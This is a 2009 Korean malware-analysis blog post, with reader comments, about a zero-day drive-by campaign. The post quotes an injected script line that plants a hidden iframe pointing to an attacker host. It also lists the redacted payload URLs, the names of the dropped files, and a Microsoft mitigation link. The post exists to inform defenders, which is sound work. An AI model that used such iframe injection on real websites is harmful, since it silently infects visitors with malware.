태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

신종악성코드정보2009. 7. 12. 11:23


http://viruslab.tistory.com/887

사용자 삽입 이미지

기존에 H.exe 를 유포했던 공격자(조직)가 이번에 Zero-Day 취약점을 통해서 악성코드 유포를 진행 중입니다.

http://www.(생략).co.kr/
http://www.(생략).co.kr/Lib/Script/common.js
}document.write('<iframe height=0 width=0 src="http://211.(생략).65/index.htm"></iframe>');

Zero-Day Exploit Code -> 임시조치 -> http://support.microsoft.com/kb/972890

http://211.(생략).65/logo.jpg
http://211.(생략).65/go1.jpg
http://211.(생략).65/go.jpg
http://211.(생략).65/go2.jpg

설치되는 EXE 악성코드

http://www.(생략).or.kr/HH.exe
http://www.(생략).kr/admin/order/mlist/3.txt
http://www.(생략).kr/admin/order/mlist/ip.rar

감염이 이루어지면 시스템 폴더에 다음과 같은 파일이 생성(일부 숨김속성)됩니다.

zhido.exe
e8main0.dll
cao110.dll
cao220.dll

윈도우 폴더에 생성되는 AhnRpta.exe 는 정상적인 메모장(notepad.exe)파일의 복사본이며, 이것을 이용해서 특정 사이트에 접속하여 변종을 다운로드 하는 매개체로 사용합니다.

cao220.dll 파일은 {C8414FA0-BA90-4600-B7EA-0CEFAF5A0636} CLSID 값을 이용합니다.

ip.rar 파일은 RAR 파일처럼 위장하고 있으며, 암호화된 형식으로 실제로는 zhido.exe 로 설치됩니다.

Posted by viruslab

댓글을 달아 주세요

  1. 그 사이트의 경우 방문자가 당연히 영상을 위해 제시되는 activex를 설치할 수 있기에 매우 좋은(?) 곳을 노린 것 같습니다.

    2009.07.12 12:33 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • 아..그래요?^^

      전 바로 안뜨던데..못본건지 모르겠네요.ㅋㅋ

      일단 감염과정은 기존에 보고된 방식과 거의 같은 것으로 기억합니다.

      2009.07.12 13:05 신고 [ ADDR : EDIT/ DEL ]
  2. 바제 카페의 신화창조군 블로그 스샷을 보니 ActiveX 설치창이 위에 생성되더군요.

    내용이 마소에서 제공하는 스트림 비디오라고 표현을 한 것 같아요.

    원래 있었나? 암튼 그런 식으로 유포를 하면 당연히 설치를 할 것 같습니다.

    2009.07.12 13:19 신고 [ ADDR : EDIT/ DEL : REPLY ]
    • http://sinhwasun.tistory.com/ <- 여기 아닌가요?

      http://blog.naver.com/ghdtpdml 여기였군요^^

      2009.07.12 13:25 신고 [ ADDR : EDIT/ DEL ]